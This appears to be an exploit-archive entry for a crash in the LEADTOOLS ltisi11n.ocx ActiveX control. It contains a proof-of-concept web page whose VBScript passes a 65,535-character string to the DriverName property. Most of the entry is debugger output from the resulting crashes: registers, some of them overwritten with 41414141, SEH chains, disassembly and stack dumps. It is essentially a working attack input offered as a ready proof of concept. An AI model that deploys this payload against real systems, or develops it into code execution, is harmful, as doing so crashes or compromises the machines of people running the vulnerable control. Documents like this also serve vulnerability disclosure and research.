LEADTOOLS v11.5.0.9 ltisi11n.ocx DriverName() Access Violation

2010-11-06T00:00:00
ID 1337DAY-ID-14755
Type zdt
Reporter Matthew Bergin
Modified 2010-11-06T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            ==============================================================
LEADTOOLS v11.5.0.9 ltisi11n.ocx DriverName() Access Violation
==============================================================

<html>
Test Exploit Page
<object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
 
targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx"
prototype  = "Property Let DriverName As String"
memberName = "DriverName"
progid     = "LEADISISLib.LEADISIS"
argCount   = 1
 
arg1=String(65535, "A")
 
target.DriverName = arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C80BEB9    MOV [EDX],AL
 
Seh Chain:
--------------------------------------------------
1   7C839AD8    KERNEL32.dll
2   73352960    VBSCRIPT.dll
3   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
KERNEL32.7C80BEB9             ltisi11n.AA1537              
ltisi11n.AA1537               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltisi11n.AA64D7              
ltisi11n.AA64D7               ltisi11n.AA319B              
ltisi11n.AA319B               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.73311302            
VBSCRIPT.73311302             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C80BEB9 -> AD0013ED
EAX 0013BD41 -> AD0013ED
EBX 00AAA760 -> 00AA408F
ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 02A73000
EDI 0000302A
ESI 02A71F58 -> 00AAA760
EBP 0013BD6C -> 0013EDB0
ESP 0013BD48 -> 0000302A -> Uni: *0*0
 
 
Block Disassembly:
--------------------------------------------------
7C80BEA3    PUSH 7C80BED0
7C80BEA8    CALL 7C8024D6
7C80BEAD    AND DWORD PTR [EBP-4],0
7C80BEB1    MOV ECX,[EBP+C]
7C80BEB4    MOV EDX,[EBP+8]
7C80BEB7    MOV AL,[ECX]
7C80BEB9    MOV [EDX],AL      <--- CRASH
7C80BEBB    INC ECX
7C80BEBC    INC EDX
7C80BEBD    TEST AL,AL
7C80BEBF    JNZ SHORT 7C80BEB7
7C80BEC1    OR DWORD PTR [EBP-4],FFFFFFFF
7C80BEC5    MOV EAX,[EBP+8]
7C80BEC8    CALL 7C802511
7C80BECD    RETN 8
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12  0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16  41414141
EBP+20  41414141
EBP+24  41414141
EBP+28  41414141
 
 
Stack Dump:
--------------------------------------------------
13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00  [....X...`...H...]
13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C  [................]
13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02  [................]
13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C919084    MOV ECX,[EBX]
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C90E920    ntdll.dll
4   7C90E920    ntdll.dll
5   73352960    VBSCRIPT.dll
6   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C919084                ntdll.7C96EEA0               
ntdll.7C96EEA0                ntdll.7C94B394               
ntdll.7C94B394                ntdll.7C918F21               
ntdll.7C918F21                ltisi11n.AA69BC              
ltisi11n.AA69BC               ltisi11n.AA7189              
ltisi11n.AA7189               ltisi11n.AA154C              
ltisi11n.AA154C               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltisi11n.AA64D7              
ltisi11n.AA64D7               ltisi11n.AA319B              
ltisi11n.AA319B               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.73311302            
VBSCRIPT.73311302             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 02A70168 -> 00000000
EDI 41414141
ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013B824 -> 0013B8A8
ESP 0013B608 -> 0000001C
 
 
Block Disassembly:
--------------------------------------------------
7C91906D    MOV [EBP-25],AL
7C919070    LEA EAX,[ESI+8]
7C919073    MOV EDI,[EAX]
7C919075    MOV [EBP-1E4],EDI
7C91907B    MOV EBX,[ESI+C]
7C91907E    MOV [EBP-164],EBX
7C919084    MOV ECX,[EBX]     <--- CRASH
7C919086    CMP ECX,[EDI+4]
7C919089    JNZ 7C92CC59
7C91908F    CMP ECX,EAX
7C919091    JNZ 7C92CC59
7C919097    PUSH ESI
7C919098    PUSH DWORD PTR [EBP-1C]
7C91909B    CALL 7C910684
7C9190A0    MOV [EBX],EDI
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A70000 -> 000000C8
EBP+12  50000161
EBP+16  0000001C
EBP+20  02A70000 -> 000000C8
EBP+24  00000000
EBP+28  02A70000 -> 000000C8
 
 
Stack Dump:
--------------------------------------------------
13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00  [................]
13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00  [................]
13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00  [.........`......]
 
 
 
Exception Code: BREAKPOINT
Disasm: 7C90120E    INT3
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C90E920    ntdll.dll
4   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C90120F                ntdll.7C95F38C               
ntdll.7C95F38C                ntdll.7C96E507               
ntdll.7C96E507                ntdll.7C96F75E               
ntdll.7C96F75E                ntdll.7C94BC4C               
ntdll.7C94BC4C                ntdll.7C927573               
ntdll.7C927573                ltisi11n.AA69F4              
ltisi11n.AA69F4               VBSCRIPT.733015F2            
VBSCRIPT.733015F2             VBSCRIPT.7331EEE1            
VBSCRIPT.7331EEE1             VBSCRIPT.7331F192            
VBSCRIPT.7331F192             VBSCRIPT.7331F632            
VBSCRIPT.7331F632             VBSCRIPT.73321CB3            
VBSCRIPT.73321CB3             SCROBJ.5CE448DD              
SCROBJ.5CE448DD               SCROBJ.5CE49EEA              
SCROBJ.5CE49EEA               SCROBJ.5CE49E41              
SCROBJ.5CE49E41               1013CE7                      
1013CE7                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C90120F -> 000B0041
EAX 02A71EF0 -> 000B0041
EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 7C91EAD5 -> FF0014C2
EDX 0013EECE -> EEF4000A
EDI 000001EC
ESI 02A71EF0 -> 000B0041
EBP 0013F0D4 -> 0013F0EC
ESP 0013F0D0 -> 7C96E139
 
 
Block Disassembly:
--------------------------------------------------
7C9011FF    TEST BYTE PTR [ESI+10],10
7C901203    JE 7C90FEF6
7C901209    POP ESI
7C90120A    LEAVE
7C90120B    RETN 4
7C90120E    INT3
7C90120F    RETN      <--- CRASH
7C901210    MOV EDI,EDI
7C901212    INT3
7C901213    RETN
7C901214    MOV EDI,EDI
7C901216    MOV EAX,[ESP+4]
7C90121A    INT3
7C90121B    RETN 4
7C90121E    MOV EAX,FS:[18]
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A71EF0 -> 000B0041
EBP+12  02A71EF0 -> 000B0041
EBP+16  02A70000 -> 000000C8
EBP+20  02A71EF0 -> 000B0041
EBP+24  0013F100 -> 0013F174
EBP+28  7C96E507 -> 3374C084
 
 
Stack Dump:
--------------------------------------------------
13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02  [................]
13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00  [................]
13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02  [................]
13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02  [t...^...........]
13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40  [............`...]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C96E478    CMP BYTE PTR [EBX+7],FF
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C839AD8    KERNEL32.dll
4   7C90E920    ntdll.dll
5   7C839AD8    KERNEL32.dll
6   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C96E478                ntdll.7C96FA1D               
ntdll.7C96FA1D                ntdll.7C94D281               
ntdll.7C94D281                KERNEL32.7C834D23            
KERNEL32.7C834D23             LTKRN11n.2001087F            
LTKRN11n.2001087F             ntdll.7C913A43               
ntdll.7C913A43                KERNEL32.7C80C136            
KERNEL32.7C80C136             KERNEL32.7C80B72F            
 
 
Registers:
--------------------------------------------------
EIP 7C96E478
EAX FFFFFFF8
EBX FFFFFFF8
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97E5A0
EDI 00000000
ESI 00150000 -> 000000C8
EBP 00FFFD9C -> 00FFFDEC
ESP 00FFFD94 -> 00150000
 
 
Block Disassembly:
--------------------------------------------------
7C96E468    PUSH EBX
7C96E469    MOV EBX,[EBP+C]
7C96E46C    TEST EBX,EBX
7C96E46E    PUSH ESI
7C96E46F    MOV ESI,[EBP+8]
7C96E472    JE 7C96E53E
7C96E478    CMP BYTE PTR [EBX+7],FF   <--- CRASH
7C96E47C    JNZ SHORT 7C96E4BC
7C96E47E    CMP BYTE PTR [ESI+586],2
7C96E485    JNZ SHORT 7C96E48F
7C96E487    MOV EAX,[ESI+580]
7C96E48D    JMP SHORT 7C96E491
7C96E48F    XOR EAX,EAX
7C96E491    TEST EAX,EAX
7C96E493    JE 7C96E53E
 
 
ArgDump:
--------------------------------------------------
EBP+8   00150000 -> 000000C8
EBP+12  FFFFFFF8
EBP+16  7C96FADC -> Asc: RtlGetUserInfoHeap
EBP+20  00000000
EBP+24  00000000
EBP+28  00000003
 
 
Stack Dump:
--------------------------------------------------
FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C  [................]
FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00  [................]
FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E  [........l.....D.]
FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00  [........[.......]
FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C  [................]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
Debug String Log
--------------------------------------------------
 
HEAP[wscript.exe]:
Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec



#  0day.today [2018-01-03]  #